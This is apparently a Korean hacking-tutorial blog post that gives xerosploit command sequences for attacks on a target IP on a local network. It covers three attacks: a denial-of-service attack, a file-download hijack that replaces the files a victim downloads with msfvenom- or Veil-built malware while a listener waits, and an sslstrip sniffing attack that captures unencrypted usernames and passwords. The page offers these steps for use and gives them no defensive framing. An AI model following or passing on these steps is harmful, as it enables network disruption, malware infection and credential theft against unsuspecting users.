[명령어 및 사용법]
1.DOS 공격
xerosploit을 틀어줍니다.
>scan
>[타겟 아이피]
>dos
>run
2.RDownload 공격 - 피해자가 파일을 다운받으면 악성코드가 다운됩니다.
우선 악성코드 파일과 리스너가 필요합니다.
Veil 도구나 msfvenom 등 툴로 악성코드를 생성 후 리스닝을 시켜 준 상태로 만듭니다.
>scan
>[타겟 아이피]
>rdownload
>run
>exe - 어떠한 확장자를 가진 파일을 다운받았을때 악성코드를 넣을거냐는 것인데 편한대로 넣어줍니다.
>/root/virus.exe - 미리 msfvenom 등을 통해 만들어둔 악성코드 파일 경로
3.Email 공격
>scan
>[타겟 아이피]
>sniff
>run
>y
y를 해서 sslstrip이 틀어지면 타겟 컴퓨터가 브라우저에서 하는 입력값 등을 스니핑할 수 있습니다.
만약 입력값이 암호화되지 않는 경우 타겟 컴퓨터에서 아이디 비번을 입력하면 해당 내용을 얻어와 아이디 비번을 알수 있습니다.
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
| 취약점 분석 도구 nessus 설치법 (0) | 2023.12.28 |
|---|---|
| Ettercap으로 공유기 계정 해킹 (0) | 2023.12.28 |
| 중간자 공격으로 피해자가 보는 브라우저 이미지 변경하기 [xerosploit] (0) | 2023.12.27 |
| TCP Idle Scan [좀비를 이용한 정보수집] (0) | 2023.12.27 |
| 세션 하이재킹 툴 [햄스터와 페릿] (0) | 2023.12.27 |
